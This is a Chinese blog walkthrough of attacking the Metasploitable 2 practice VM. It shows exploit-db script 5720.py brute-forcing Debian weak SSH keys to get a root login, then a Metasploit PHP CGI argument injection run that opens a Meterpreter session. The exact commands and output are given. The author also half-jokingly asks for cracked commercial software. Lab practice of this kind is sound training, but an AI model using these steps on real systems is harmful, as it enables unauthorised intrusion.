metasploitable 2 c4rp3nt3r 测试笔记
最近metasploit发布了metasploitable 2,作为一个练习用的linux操作系统. 采用Ubuntu 8.04的OS,搭配各种漏洞,正好满足了广大穷屌丝日益增长的装X和意淫需求.
下载地址: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
metasploit官方的用户指南
详见: https://community.rapid7.com/docs/DOC-1875
孤陋寡闻的我原来没有玩过这么高级的东西,就下载回来测试了下一把.
操起nmap 和 nessus一阵狂扫发现N多服务N多高危漏洞.
![nessus scan report](http://www.0x50sec.org/wp-content/uploads/2012/06/nessus-all.png)
metasploitable就好比一道练习题,做题当然要捡自己掌握不好的来做,否则失去做题的意义了.很多一击必中的漏洞和后门都没多大意思,我们对结果不太确定的东西感兴趣.先看看22端口扫描出的漏洞.
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness CVE-2008-0166
![nessus-ssh-vuln](http://www.0x50sec.org/wp-content/uploads/2012/06/nessus-22.png)
既然是metasploitable那么就请metasploit出马吧
搜一下有木有exp
msf > search cve:2008-0166
msf >
尼玛,这个真木有,估计metasploit pro应该有这个exp吧,穷屌丝哪有钱买那个,谁有破解的,真心求.
我擦,穷屌丝只好搜搜exploit-db了.本地搜索的话可以先svn update一下.
1 | root@bt:/pentest/exploits/exploitdb# ./searchsploit openssl |
3 | --------------------------------------------------------------------------- ------------------------- |
4 | Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b) /multiple/dos/146.c |
5 | Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c) /linux/remote/764.c |
6 | OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit /multiple/dos/4773.pl |
7 | Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit /multiple/remote/5622.txt |
8 | Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby) /multiple/remote/5632.rb |
9 | Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python) /linux/remote/5720.py |
10 | OpenSSL <= 0.9.8k /multiple/dos/8720.c |
11 | OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit /multiple/dos/8873.c |
12 | OpenSSL remote DoS /linux/dos/12334.c |
13 | OpenSSL ASN1 BIO Memory Corruption Vulnerability /multiple/dos/18756.txt |
挑一个python的exp,打开瞧瞧,就会发现贴心的用法
1 | # Autor: hitz - WarCat team (warcat.no-ip.org) |
2 | # Collaborator: pretoriano |
6 | # 2. Extract it to a directory |
8 | # 3. Execute the python script |
9 | # - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5 |
10 | # - execute: python exploit.py (without parameters) to display the help |
11 | # - if the key is found, the script shows something like that: |
12 | # Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121 |
13 | # Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240 |
好吧开干
4 | tar jxvf debian_ssh_rsa_2048_x86.tar.bz2 |
6 | root@bt:~/Desktop# python 5720.py |
8 | -OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org |
9 | ./exploit.py <dir> <host> <user> [[port] [threads]] |
10 | <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash |
11 | <host>: The victim host |
12 | <user>: The user of the victim host |
13 | [port]: The SSH port of the victim host (default 22) |
14 | [threads]: Number of threads (default 4) Too big numer is bad |
15 | root@bt:~/Desktop# python 5720.py ~/Desktop/rsa/2048/ 192.168.1.103 root |
等到花儿谢了之后,发现成功了
![exploit-ssh-success](http://www.0x50sec.org/wp-content/uploads/2012/06/exploit-ssh-success.png)
赶紧试一试.
1 | root@bt:~/Desktop# ssh -lroot -p22 -i /root/Desktop/rsa/2048//57c3115d77c56390332dc5c49978627a-5429 192.168.1.103 |
2 | Last login: Thu Jun 21 21:06:33 2012 from 192.168.1.100 |
3 | Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 |
5 | The programs included with the Ubuntu system are free software; |
6 | the exact distribution terms for each program are described in the |
7 | individual files in /usr/share/doc/*/copyright. |
9 | Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by |
12 | To access official Ubuntu documentation, please visit: |
17 | root@metasploitable:~# id |
18 | uid=0(root) gid=0(root) groups=0(root) |
![ssh-login-success](http://www.0x50sec.org/wp-content/uploads/2012/06/ssh-login.png)
我勒个去,真登录进去了,这尼玛太也容易了.
继续看看吧,别人公布的利用方法咱就不看了.
看看web目录有些什么菜吧.有一个存在漏洞的的phpMyAdmin.还有一套wiki程序以及一些专门练习web漏洞用的Mutillidae和DVWA.
![metasploitable-index-page](http://www.0x50sec.org/wp-content/uploads/2012/06/index.png)
练习用的太简单了咱就不玩了,TWiki也不好玩,mysql的密码前面nessus已经扫描出来了,web程序也不好玩.扫扫目录看有什么东西没有.
找一个轻量级的perl程序随便扫扫先.结果如下
1 | ++++++++++++++++++++++++++++++++++++ |
8 | ++++++++++++++++++++++++++++++++++++ |
看看phpinfo.php吧.某国际***说除了phpinfo.php啥都没有,其实有时候一个phpinfo.php足够拿个shell了.
看了下是cgi方式运行的php,访问
![php-cgi-arg-injection-vuln](http://www.0x50sec.org/wp-content/uploads/2012/06/php-cgi-vul.png)
尼玛这不是那个谁吗,PHP CGI Argument Injection 漏洞啊
这次再请出metasploit出场,你是主角啊,给点力行不?
1 | msf > search cve:2012-1823 |
6 | Name Disclosure Date Rank Description |
7 | ---- --------------- ---- ----------- |
8 | exploit/multi/http/php_cgi_arg_injection 2012-05-03 excellent PHP CGI Argument Injection |
这次真有了,好吧metasploit时间到了
1 | msf exploit(php_cgi_arg_injection) > use exploit/multi/http/php_cgi_arg_injection |
2 | msf exploit(php_cgi_arg_injection) > set RHOST 192.168.1.103 |
4 | msf exploit(php_cgi_arg_injection) > set TARGETURI /phpinfo.php |
5 | TARGETURI => /phpinfo.php |
6 | msf exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp |
7 | PAYLOAD => php/meterpreter/bind_tcp |
8 | msf exploit(php_cgi_arg_injection) > exploit |
10 | [*] Started bind handler |
11 | [*] Sending stage (39217 bytes) to 192.168.1.103 |
12 | [*] Meterpreter session 1 opened (192.168.1.100:35125 -> 192.168.1.103:4444) at 2012-06-22 11:38:21 +0800 |
17 | Server username: www-data (33) |
![exploit-php-cgi-arg-injection](http://www.0x50sec.org/wp-content/uploads/2012/06/exploit-php-cgi-arg-inj.png)
好吧用metasploit成功了一次.总算没白叫metasploitable.
之后又测试了里面的web漏洞,没什么意思就不写了.啥时候国人搞一个类似的系统呢?放上国产的cms,别放那么多溢出和弱口令,搞个游戏或者竞赛其实挺好玩的.